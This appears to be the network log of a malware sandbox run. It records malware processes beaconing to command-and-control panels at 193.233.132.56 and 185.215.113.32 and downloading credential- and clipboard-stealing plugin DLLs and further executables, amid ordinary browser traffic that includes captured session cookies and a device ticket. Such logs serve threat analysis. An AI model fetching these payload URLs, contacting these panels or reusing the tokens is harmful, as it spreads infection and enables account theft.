          http://193.233.132.56/Pneh2sXQk0/index.php
          rundll32.exe
          Remote address:
          193.233.132.56:80
          Request
          POST /Pneh2sXQk0/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 193.233.132.56
          Content-Length: 21
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:29:25 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          GET
          https://scontent.xx.fbcdn.net/hads-ak-prn2/1487645_6012475414660_1439393861_n.png
          MicrosoftEdgeCP.exe
          Remote address:
          157.240.210.14:443
          Request
          GET /hads-ak-prn2/1487645_6012475414660_1439393861_n.png HTTP/2.0
          host: scontent.xx.fbcdn.net
          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
          referer: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          Response
          HTTP/2.0 200
          content-type: image/png
          last-modified: Fri, 21 Dec 2012 00:00:01 GMT
          expires: Thu, 04 Apr 2024 22:29:25 GMT
          cross-origin-resource-policy: cross-origin
          content-length: 79
          server: proxygen-bolt
          date: Thu, 04 Apr 2024 22:29:25 GMT
          x-fb-connection-quality: EXCELLENT; q=0.9, rtt=49, rtx=0, c=13, mss=1357, tbw=3397, tp=-1, tpl=-1, uplat=0, ullat=-1
          alt-svc: h3=":443"; ma=86400
        • flag-be
          GET
          https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ARZ0qKIkPd5m8tK7LDiCRzNEPdYPFeVxHwxwT_s6ZtLI7ImZ4RnazsWByJA12WLgoqUqs6XMJNKngw&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-670276307%3A1712269761405740&theme=mn&ddm=0
          MicrosoftEdgeCP.exe
          Remote address:
          108.177.15.84:443
          Request
          GET /v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ARZ0qKIkPd5m8tK7LDiCRzNEPdYPFeVxHwxwT_s6ZtLI7ImZ4RnazsWByJA12WLgoqUqs6XMJNKngw&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-670276307%3A1712269761405740&theme=mn&ddm=0 HTTP/2.0
          host: accounts.google.com
          accept: text/html, application/xhtml+xml, image/jxr, */*
          accept-language: en-US
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          accept-encoding: gzip, deflate, br
          cookie: __Host-GAPS=1:d1LVW--03DMTlUpSls6JD7f9aYQw5Q:GjdgE8sWndS7SiuR
          Response
          HTTP/2.0 200
          content-type: text/html; charset=utf-8
          x-frame-options: DENY
          set-cookie: __Host-GAPS=1:pzZctzjTsfHzm1877XYlVDa97cBr1Q:IBqw3UDKqqbLGLVk; Expires=Sat, 04-Apr-2026 22:29:25 GMT; Path=/; Secure; HttpOnly; Priority=HIGH
          vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
          x-auto-login: realm=com.google&args=continue%3Dhttps://accounts.google.com/
          x-ua-compatible: IE=edge
          cache-control: no-cache, no-store, max-age=0, must-revalidate
          pragma: no-cache
          expires: Mon, 01 Jan 1990 00:00:00 GMT
          date: Thu, 04 Apr 2024 22:29:25 GMT
          strict-transport-security: max-age=31536000; includeSubDomains
          cross-origin-opener-policy-report-only: same-origin; report-to="AccountsSignInUi"
          content-security-policy: script-src 'unsafe-inline' https: http:;object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self'
          content-security-policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport
          report-to: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]}
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
          cross-origin-resource-policy: same-site
          reporting-endpoints: default="/v3/signin/_/AccountsSignInUi/web-reports?context=eJzjWsKoxSXF4KwhxbBHaReTY-wTJlcgntv9lGkhEC9__5RpNRDHrHrGlADEB-OeMx0F4rcJL5g-AnFr6wumTiDe3POCaTsQT-N5yTQLiI9sf8l0AojffXnJxPH1JZMEEKsBMd-66awqQKy5fjprIBDL_5rOqgzETukzWAOA2Kd-BmsUELfePMc6GYiT_p1nLQBiIS6OY5f3bGATOLHCDgAjQVEh"
          content-encoding: gzip
          server: ESF
          x-xss-protection: 0
          x-content-type-options: nosniff
          alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
        • flag-us
          POST
          https://watson.telemetry.microsoft.com/Telemetry.Request
          Remote address:
          52.168.117.173:443
          Request
          POST /Telemetry.Request HTTP/1.1
          Connection: Keep-Alive
          User-Agent: MSDW
          MSA_DeviceTicket: t=EwC4AlN5BAAUu1V9OkIAK55tj6h8OjaXgvkszYkAAbJ2dlNhMEQlZFBq7miVi8y/Z+0oKLpa/bFCA7a5tSGcNe034dfFu0J59TXlXFcXNNWFcgSJq1bizm0uRQOloFq/kHy5ynXJW61ISeEsiORvB1M3Dj+5qcTsHY4XAf1lOEetP+q+l7JOaxeNQJ+PdmFS9DrIv/ASp4GgxRQzUPPmB3wNORRn9zQvRer9p0zaviw542ZXkhgXlBFne5vW0w/WVI3PcU8NHJDClK1nTRt60FjXEhceTFxj3UTLQwbD/WdlouXcSYiV+jMt5VnWaJvZgw7BBA9h83sa+v59wsZjvobdHYbkl3VU1nKIDn3Sb/8KMWppD6LRHC3cA+f/VWcDZgAACEg2h5xvSx9diAEA5TsnGK6HqnqOlHKdk+jZQP9cCEI6cWC1HTvmixEa5ADyJF1zFnzYgr0hJfPxgwJcc6eOAtm0D8VrIEtIumyIHgirE8skRzj10QxU/OPc8vWHiohqHhLHLkwK+oqtCwjI/kC+btkf2erZojLpAy1jxbfXMG2ezHrS1ZWJlvSfaH12rcNQzcF629nbmDCmNnvX5j2Hm1NHCwG7AgTMxahEfHWmFEmoDUJS/witvd2OclnVqt8jfN+G1nfDadONzkWmwcztjHDurVMrRXfLGcsCQsGmRHgs4IDPrzE0Qh4vjduQ5LDF1l4lYVN3GGexQJUL7TVaU609JhA5P/KXZ0OFiUcjlYNtc5ByU7dnJhkM83h33QKxtOI/3v0joyVJh01xt59ShsrIbRjSi+DGORP7hkIIFZZGOK0VqEhbnI22KfX4Tt43+LY2DfNcTDfPES9Hd3nQJ9Iz+5IM+9obPgBFlZEfbBkYtkSySxw1Qx1J1fmiLupPYt2qcLrn17eQ1MmuiRPUdr96y7gB&p=
          AAD_TenantId: (null)
          Content-Length: 4623
          Host: watson.telemetry.microsoft.com
          Response
          HTTP/1.1 200 200 OK
          Content-Length: 741
          Content-Type: text/xml
          Server: Microsoft-HTTPAPI/2.0
          Strict-Transport-Security: max-age=31536000
          Date: Thu, 04 Apr 2024 22:29:27 GMT
        • flag-ru
          POST
          http://193.233.132.56/Pneh2sXQk0/index.php
          rundll32.exe
          Remote address:
          193.233.132.56:80
          Request
          POST /Pneh2sXQk0/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 193.233.132.56
          Content-Length: 5
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:29:34 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-us
          DNS
          161.19.199.152.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          161.19.199.152.in-addr.arpa
          IN PTR
          Response
        • flag-ru
          POST
          http://185.215.113.32/yandex/index.php
          explorgu.exe
          Remote address:
          185.215.113.32:80
          Request
          POST /yandex/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 185.215.113.32
          Content-Length: 4
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:30:02 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-ru
          POST
          http://185.215.113.32/yandex/index.php
          explorgu.exe
          Remote address:
          185.215.113.32:80
          Request
          POST /yandex/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 185.215.113.32
          Content-Length: 158
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:30:02 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-ru
          GET
          http://185.215.113.32/yandex/Plugins/cred64.dll
          explorgu.exe
          Remote address:
          185.215.113.32:80
          Request
          GET /yandex/Plugins/cred64.dll HTTP/1.1
          Host: 185.215.113.32
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:30:12 GMT
          Content-Type: application/octet-stream
          Content-Length: 1285632
          Last-Modified: Sun, 04 Feb 2024 16:00:19 GMT
          Connection: keep-alive
          ETag: "65bfb493-139e00"
          Accept-Ranges: bytes
        • flag-ru
          GET
          http://185.215.113.32/yandex/Plugins/clip64.dll
          explorgu.exe
          Remote address:
          185.215.113.32:80
          Request
          GET /yandex/Plugins/clip64.dll HTTP/1.1
          Host: 185.215.113.32
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:30:25 GMT
          Content-Type: application/octet-stream
          Content-Length: 112128
          Last-Modified: Sun, 04 Feb 2024 16:00:18 GMT
          Connection: keep-alive
          ETag: "65bfb492-1b600"
          Accept-Ranges: bytes
        • flag-us
          DNS
          32.113.215.185.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          32.113.215.185.in-addr.arpa
          IN PTR
          Response
        • flag-ru
          POST
          http://185.215.113.32/yandex/index.php
          rundll32.exe
          Remote address:
          185.215.113.32:80
          Request
          POST /yandex/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 185.215.113.32
          Content-Length: 21
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:30:16 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
          Refresh: 0; url = Login.php
        • flag-us
          DNS
          200.197.79.204.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          200.197.79.204.in-addr.arpa
          IN PTR
          Response
          200.197.79.204.in-addr.arpa
          IN PTR
          a-0001a-msedgenet
        • flag-us
          DNS
          www.microsoft.com
          MicrosoftEdge.exe
          Remote address:
          8.8.8.8:53
          Request
          www.microsoft.com
          IN A
          Response
          www.microsoft.com
          IN CNAME
          www.microsoft.com-c-3.edgekey.net
          www.microsoft.com-c-3.edgekey.net
          IN CNAME
          www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
          www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
          IN CNAME
          e13678.dscb.akamaiedge.net
          e13678.dscb.akamaiedge.net
          IN A
          2.17.5.133
        • flag-us
          DNS
          133.5.17.2.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          133.5.17.2.in-addr.arpa
          IN PTR
          Response
          133.5.17.2.in-addr.arpa
          IN PTR
          a2-17-5-133deploystaticakamaitechnologiescom
        • flag-gb
          GET
          https://www.bing.com/cortanaassist/rules?cc=US&version=6
          MicrosoftEdge.exe
          Remote address:
          2.18.66.89:443
          Request
          GET /cortanaassist/rules?cc=US&version=6 HTTP/2.0
          host: www.bing.com
          accept: */*
          accept-encoding: gzip, deflate, br
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
          dnt: 1
          Response
          HTTP/2.0 404
          cache-control: private
          content-length: 51676
          content-type: text/html; charset=utf-8
          content-encoding: br
          vary: Accept-Encoding
          p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
          x-eventid: 660f2a02aad34398926d9ccd6683c375
          useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          x-error-page: 404-custom
          x-ua-compatible: IE=edge
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          x-msedge-ref: Ref A: 160626C9FEC0416584A2643845CA610F Ref B: LON04EDGE1015 Ref C: 2024-04-04T22:30:26Z
          date: Thu, 04 Apr 2024 22:30:26 GMT
          set-cookie: MUID=2D4057852BC6613A21A143D22A266035; domain=.bing.com; expires=Tue, 29-Apr-2025 22:30:26 GMT; path=/; secure; SameSite=None
          set-cookie: MUIDB=2D4057852BC6613A21A143D22A266035; expires=Tue, 29-Apr-2025 22:30:26 GMT; path=/; HttpOnly
          set-cookie: _EDGE_S=F=1&SID=211EA850A0C263251278BC07A1226222&mkt=en-us; domain=.bing.com; path=/; HttpOnly
          set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 29-Apr-2025 22:30:26 GMT; path=/; HttpOnly
          set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Sat, 04-Apr-2026 22:30:26 GMT; path=/
          set-cookie: SRCHUID=V=2&GUID=CD55E8BCB03B48388F66CDA52E49918A&dmnchg=1; domain=.bing.com; expires=Sat, 04-Apr-2026 22:30:26 GMT; path=/
          set-cookie: SRCHUSR=DOB=20240404; domain=.bing.com; expires=Sat, 04-Apr-2026 22:30:26 GMT; path=/
          set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Sat, 04-Apr-2026 22:30:26 GMT; path=/
          set-cookie: _SS=SID=211EA850A0C263251278BC07A1226222; domain=.bing.com; path=/
          alt-svc: h3=":443"; ma=93600
          x-cdn-traceid: 0.55421202.1712269826.dedc139
        • flag-ru
          POST
          http://185.215.113.32/yandex/index.php
          rundll32.exe
          Remote address:
          185.215.113.32:80
          Request
          POST /yandex/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 185.215.113.32
          Content-Length: 5
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:30:26 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-us
          DNS
          89.66.18.2.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          89.66.18.2.in-addr.arpa
          IN PTR
          Response
          89.66.18.2.in-addr.arpa
          IN PTR
          a2-18-66-89deploystaticakamaitechnologiescom
        • flag-us
          DNS
          9.173.189.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          9.173.189.20.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          241.66.18.2.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          241.66.18.2.in-addr.arpa
          IN PTR
          Response
          241.66.18.2.in-addr.arpa
          IN PTR
          a2-18-66-241deploystaticakamaitechnologiescom
        • flag-ru
          POST
          http://193.233.132.56/Pneh2sXQk0/index.php
          explorha.exe
          Remote address:
          193.233.132.56:80
          Request
          POST /Pneh2sXQk0/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 193.233.132.56
          Content-Length: 4
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:32:23 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
          Refresh: 0; url = Login.php
        • flag-ru
          POST
          http://193.233.132.56/Pneh2sXQk0/index.php
          explorha.exe
          Remote address:
          193.233.132.56:80
          Request
          POST /Pneh2sXQk0/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 193.233.132.56
          Content-Length: 158
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:32:23 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-ru
          POST
          http://185.215.113.32/yandex/index.php
          explorgu.exe
          Remote address:
          185.215.113.32:80
          Request
          POST /yandex/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 185.215.113.32
          Content-Length: 4
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:33:02 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-ru
          POST
          http://185.215.113.32/yandex/index.php
          explorgu.exe
          Remote address:
          185.215.113.32:80
          Request
          POST /yandex/index.php HTTP/1.1
          Content-Type: application/x-www-form-urlencoded
          Host: 185.215.113.32
          Content-Length: 158
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Thu, 04 Apr 2024 22:33:02 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • 193.233.132.56:80
          http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dll
          http
          explorha.exe
          49.5kB
           1.4MB
           1047
          1043

          HTTP Request

          POST http://193.233.132.56/Pneh2sXQk0/index.php

          HTTP Response

          200

          HTTP Request

          POST http://193.233.132.56/Pneh2sXQk0/index.php

          HTTP Response

          200

          HTTP Request

          POST http://193.233.132.56/Pneh2sXQk0/index.php

          HTTP Response

          200

          HTTP Request

          POST http://193.233.132.56/Pneh2sXQk0/index.php

          HTTP Response

          200

          HTTP Request

          POST http://193.233.132.56/Pneh2sXQk0/index.php

          HTTP Response

          200

          HTTP Request

          GET http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dll

          HTTP Response

          200

          HTTP Request

          GET http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dll

          HTTP Response

          200
        • 193.233.132.167:80
          http://193.233.132.167/mine/amert.exe
          http
          explorha.exe
          317.0kB
           9.4MB
           6771
          6770

          HTTP Request

          GET http://193.233.132.167/cost/random.exe

          HTTP Response

          200

          HTTP Request

          GET http://193.233.132.167/cost/sarra.exe

          HTTP Response

          200

          HTTP Request

          GET http://193.233.132.167/cost/go.exe

          HTTP Response

          200

          HTTP Request

          GET http://193.233.132.167/mine/amert.exe

          HTTP Response

          200
        • 142.250.180.14:443
          www.youtube.com
          tls, http2
          MicrosoftEdgeCP.exe
          1.1kB
           7.6kB
           16
          12
        • 142.250.180.14:443
          https://www.youtube.com/account
          tls, http2
          MicrosoftEdgeCP.exe
          1.7kB
           9.4kB
           22
          17

          HTTP Request

          GET https://www.youtube.com/account

          HTTP Response

          302
        • 157.240.210.35:443
          www.facebook.com
          tls, http2
          MicrosoftEdgeCP.exe
          1.2kB
           4.0kB
           17
          13
        • 157.240.210.35:443
          https://www.facebook.com/images/cookies/cookie_info_popup_image_4.png
          tls, http2
          MicrosoftEdgeCP.exe
          13.4kB
           303.9kB
           250
          236

          HTTP Request

          GET https://www.facebook.com/video

          HTTP Response

          200

          HTTP Request

          GET https://www.facebook.com/images/cookies/cookie_info_card_image_1.png

          HTTP Request

          GET https://www.facebook.com/images/cookies/cookie_info_card_image_2.png

          HTTP Request

          GET https://www.facebook.com/images/cookies/cookie_info_card_image_3.png

          HTTP Request

          GET https://www.facebook.com/images/cookies/cookie_info_card_image_4.png

          HTTP Request

          GET https://www.facebook.com/images/cookies/cookie_info_popup_image_1.png

          HTTP Request

          GET https://www.facebook.com/images/cookies/cookie_info_popup_image_2.png

          HTTP Request

          GET https://www.facebook.com/images/cookies/cookie_info_popup_image_3.png

          HTTP Request

          GET https://www.facebook.com/images/cookies/cookie_info_popup_image_4.png

          HTTP Response

          200

          HTTP Response

          200

          HTTP Response

          200

          HTTP Response

          200

          HTTP Response

          200

          HTTP Response

          200

          HTTP Response

          200

          HTTP Response

          200
        • 108.177.15.84:443
          https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ARZ0qKIkPd5m8tK7LDiCRzNEPdYPFeVxHwxwT_s6ZtLI7ImZ4RnazsWByJA12WLgoqUqs6XMJNKngw&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-670276307%3A1712269761405740&theme=mn&ddm=0
          tls, http2
          MicrosoftEdgeCP.exe
          6.7kB
           123.8kB
           114
          108

          HTTP Request

          GET https://accounts.google.com/

          HTTP Response

          302

          HTTP Request

          GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

          HTTP Response

          302

          HTTP Request

          GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=ARZ0qKIuVjc_3i5cwJNuj_qUNsaMCB46y8BQJ5B54qgOG1HwL_4LfJ8nUwV5T1aQVCUgRPBLk_UpZQ

          HTTP Response

          302

          HTTP Request

          GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ARZ0qKIkPd5m8tK7LDiCRzNEPdYPFeVxHwxwT_s6ZtLI7ImZ4RnazsWByJA12WLgoqUqs6XMJNKngw&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-670276307%3A1712269761405740&theme=mn&ddm=0

          HTTP Response

          200
        • 108.177.15.84:443
          accounts.google.com
          tls, http2
          MicrosoftEdgeCP.exe
          1.1kB
           5.1kB
           14
          10
        • 216.58.204.78:443
          https://consent.youtube.com/ml?continue=https://www.youtube.com/account?cbrd%3D1&gl=GB&hl=en&cm=2&pc=yt&src=1
          tls, http2
          MicrosoftEdgeCP.exe
          2.5kB
           16.5kB
           32
          28

          HTTP Request

          GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3Fcbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1

          HTTP Response

          302

          HTTP Request

          GET https://consent.youtube.com/ml?continue=https://www.youtube.com/account?cbrd%3D1&gl=GB&hl=en&cm=2&pc=yt&src=1

          HTTP Response

          200
        • 216.58.204.78:443
          consent.youtube.com
          tls, http2
          MicrosoftEdgeCP.exe
          1.1kB
           7.6kB
           16
          12
        • 142.250.200.36:443
          https://www.google.com/favicon.ico
          tls, http2
          MicrosoftEdge.exe
          1.5kB
           7.2kB
           20
          14

          HTTP Request

          GET https://www.google.com/favicon.ico

          HTTP Response

          200
        • 142.250.200.36:443
          www.google.com
          tls, http2
          MicrosoftEdge.exe
          1.1kB
           5.1kB
           15
          11
        • 157.240.210.35:443
          m.facebook.com
          tls, http2
          MicrosoftEdgeCP.exe
          1.1kB
           3.9kB
           15
          11
        • 157.240.210.35:443
          https://m.facebook.com/a/bz?fb_dtsg=NAcOBR-pIHoUcjZPpLdhbvbB_jXY6aiKWxhBNPOHAS7ZAgJdqTiQzcQ%3A0%3A0&jazoest=25041&lsd=AVoK_ucW--w&__dyn=1KQdAG1mws8-t0BBBzEnwuo98nwgU2owpUuwcC4o1nEhwem0iy1gCwjE1xoswaq1Jw20Ehw73wwyo36wdq0ny1Aw4vw8W0iW220jG3qaw4kwbS1Lw9C0hO3q0ue&__csr=&__req=4&__fmt=1&__a=AYmUA91xKfid9CUinRY4SZf-szXYW20SyXaY18Sbdpi12jL4HuyVR7lzCjl0CsNiIIpHrT6QwUu-rpo9P9JUXugWFzG_AgGamNqOurr9GUp4kQ&__user=0
          tls, http2
          MicrosoftEdgeCP.exe
          14.5kB
           43.0kB
           73
          61

          HTTP Request

          GET https://m.facebook.com/video?_rdr

          HTTP Response

          302

          HTTP Request

          GET https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fvideo&refsrc=deprecated&_rdr

          HTTP Response

          200

          HTTP Request

          POST https://m.facebook.com/a/bz?fb_dtsg=NAcOBR-pIHoUcjZPpLdhbvbB_jXY6aiKWxhBNPOHAS7ZAgJdqTiQzcQ%3A0%3A0&jazoest=25041&lsd=AVoK_ucW--w&__dyn=1KQdAG1mws8-t0BBBzEnwuo98nwgU2owpUuwcC4o1nEhwem0iy1gCwjE1xoswaq1Jw20Ehw73wwyo36wdq0ny1Aw4vw8W0iW220jG3qaw4kwbS1Lw9C0hO3q0ue&__csr=&__req=1&__fmt=1&__a=AYmUA91xKfid9CUinRY4SZf-szXYW20SyXaY18Sbdpi12jL4HuyVR7lzCjl0CsNiIIpHrT6QwUu-rpo9P9JUXugWFzG_AgGamNqOurr9GUp4kQ&__user=0

          HTTP Response

          200

          HTTP Request

          POST https://m.facebook.com/a/bz?fb_dtsg=NAcOBR-pIHoUcjZPpLdhbvbB_jXY6aiKWxhBNPOHAS7ZAgJdqTiQzcQ%3A0%3A0&jazoest=25041&lsd=AVoK_ucW--w&__dyn=1KQdAG1mws8-t0BBBzEnwuo98nwgU2owpUuwcC4o1nEhwem0iy1gCwjE1xoswaq1Jw20Ehw73wwyo36wdq0ny1Aw4vw8W0iW220jG3qaw4kwbS1Lw9C0hO3q0ue&__csr=&__req=2&__fmt=1&__a=AYmUA91xKfid9CUinRY4SZf-szXYW20SyXaY18Sbdpi12jL4HuyVR7lzCjl0CsNiIIpHrT6QwUu-rpo9P9JUXugWFzG_AgGamNqOurr9GUp4kQ&__user=0

          HTTP Request

          POST https://m.facebook.com/a/bz?fb_dtsg=NAcOBR-pIHoUcjZPpLdhbvbB_jXY6aiKWxhBNPOHAS7ZAgJdqTiQzcQ%3A0%3A0&jazoest=25041&lsd=AVoK_ucW--w&__dyn=1KQdAG1mws8-t0BBBzEnwuo98nwgU2owpUuwcC4o1nEhwem0iy1gCwjE1xoswaq1Jw20Ehw73wwyo36wdq0ny1Aw4vw8W0iW220jG3qaw4kwbS1Lw9C0hO3q0ue&__csr=&__req=3&__fmt=1&__a=AYmUA91xKfid9CUinRY4SZf-szXYW20SyXaY18Sbdpi12jL4HuyVR7lzCjl0CsNiIIpHrT6QwUu-rpo9P9JUXugWFzG_AgGamNqOurr9GUp4kQ&__user=0

          HTTP Response

          200

          HTTP Response

          200

          HTTP Request

          POST https://m.facebook.com/a/bz?fb_dtsg=NAcOBR-pIHoUcjZPpLdhbvbB_jXY6aiKWxhBNPOHAS7ZAgJdqTiQzcQ%3A0%3A0&jazoest=25041&lsd=AVoK_ucW--w&__dyn=1KQdAG1mws8-t0BBBzEnwuo98nwgU2owpUuwcC4o1nEhwem0iy1gCwjE1xoswaq1Jw20Ehw73wwyo36wdq0ny1Aw4vw8W0iW220jG3qaw4kwbS1Lw9C0hO3q0ue&__csr=&__req=4&__fmt=1&__a=AYmUA91xKfid9CUinRY4SZf-szXYW20SyXaY18Sbdpi12jL4HuyVR7lzCjl0CsNiIIpHrT6QwUu-rpo9P9JUXugWFzG_AgGamNqOurr9GUp4kQ&__user=0

          HTTP Response

          200
        • 157.240.210.14:443
          https://static.xx.fbcdn.net/rsrc.php/v3/y7/r/Jf5r4lBpPKl.png
          tls, http2
          MicrosoftEdgeCP.exe
          23.3kB
           403.8kB
           425
          384

          HTTP Request

          GET https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0,cross/w9IxuTxjQin.css?_nc_x=Ij3Wp8lg5Kz

          HTTP Request

          GET https://static.xx.fbcdn.net/rsrc.php/v3/yO/l/0,cross/svlhEGhpRGI.css?_nc_x=Ij3Wp8lg5Kz

          HTTP Request

          GET https://static.xx.fbcdn.net/rsrc.php/v3/yd/l/0,cross/klHCvhQp6_r.css?_nc_x=Ij3Wp8lg5Kz

          HTTP Request

          GET https://static.xx.fbcdn.net/rsrc.php/v3/yu/l/0,cross/bqJfhGimWwz.css?_nc_x=Ij3Wp8lg5Kz

          HTTP Request

